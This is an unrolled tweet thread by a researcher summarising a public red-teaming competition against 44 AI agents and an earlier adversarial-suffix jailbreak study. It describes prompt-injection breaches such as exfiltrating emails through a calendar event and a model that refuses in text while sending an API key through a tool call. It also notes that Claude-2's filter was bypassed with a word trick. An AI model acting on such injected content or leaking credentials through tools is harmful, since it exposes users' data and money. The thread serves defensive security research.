Andy Zou Profile picture
Jul 29 10 tweets 3 min read Read on X
We deployed 44 AI agents and offered the internet $170K to attack them.

1.8M attempts, 62K breaches, including data leakage and financial loss.

🚨 Concerningly, the same exploits transfer to live production agents… (example: exfiltrating emails through calendar event) 🧵 Image
Image
Huge thanks to @AISecurityInst , OpenAI, Anthropic, and Google DeepMind for sponsoring, and to UK and US AISI for judging. The competition was held in the @GraySwanAI Arena.

This was the largest open red‑teaming study of AI agents to date.

Paper: arxiv.org/abs/2507.20526
We deployed agents across real tasks (shopping, travel, healthcare, coding, support) with “must‑not‑break” policies: company rules, platform terms, and industry regulations.
The most secure model still had a 1.5% attack success rate (ASR).

Implication: without additional mitigations, your AI application can be compromised on the order of minutes. Image
We curated the strongest, reproducible breaks into the ART benchmark - a stress test with near 100% ASR across models we tried. We’ll be open sourcing the evaluation and a subset of the attacks for research purposes, in addition to a private leaderboard. Image
Many breaks are universal and transferable.

Copy‑paste patterns worked across tasks, models, and guardrails. If it breaks one agent today, it likely breaks yours. Image
Favorite failure: “refuse in text, act in tools.” 😈

Model: “I can’t share credentials.”
Then: send_email(to=attacker, body="API_KEY=****")

The UI looks safe; the tool layer does the damage.
Can't we just patch?

History of jailbreaks says it’s whack‑a‑mole. Prompt‑only fixes don’t hold. Durable defenses require permissioned tools, policy‑aware training, and monitoring.
The upshot?

Prompt‑injection risks appear to be a primary blocker to safe autonomous deployment. Treat AI agents like untrusted code touching live systems.

• • •

Missing some Tweet in this thread? You can try to force a refresh
 

Keep Current with Andy Zou

Andy Zou Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @andyzou_jiaming

Jul 28, 2023
🚨We found adversarial suffixes that completely circumvent the alignment of open source LLMs. More concerningly, the same prompts transfer to ChatGPT, Claude, Bard, and LLaMA-2…🧵

Website:
Paper: https://t.co/1q4fzjJSyZ https://t.co/SQZxpemCDkllm-attacks.org
arxiv.org/abs/2307.15043
Image
Claude-2 has an additional layer of safety filter. After we bypassed it with a word trick, the generation model was willing to give us the answer as well. Image
With only four adversarial suffixes, some of these best models followed harmful instructions over 60% of the time. Image
Read 12 tweets

Did Thread Reader help you today?

Support us! We are indie developers!


This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

:(